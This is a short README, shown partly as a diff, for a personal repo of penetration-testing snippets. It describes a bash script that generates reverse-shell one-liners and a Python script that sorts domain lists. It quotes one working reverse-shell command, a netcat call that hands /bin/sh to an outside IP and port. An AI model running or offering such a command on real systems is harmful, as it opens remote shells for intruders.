rewks/tidbits/README.md

 A simple bash script to take input and output a bunch of reverse shell 1-liners.
 Not very original but here we go.
 Note: Does not include super basic cmds such as `nc -e /bin/sh 10.10.10.10 1337`

+### sort_domains.py
+Reads in a file containing a list of domains and prints them properly sorted to stdout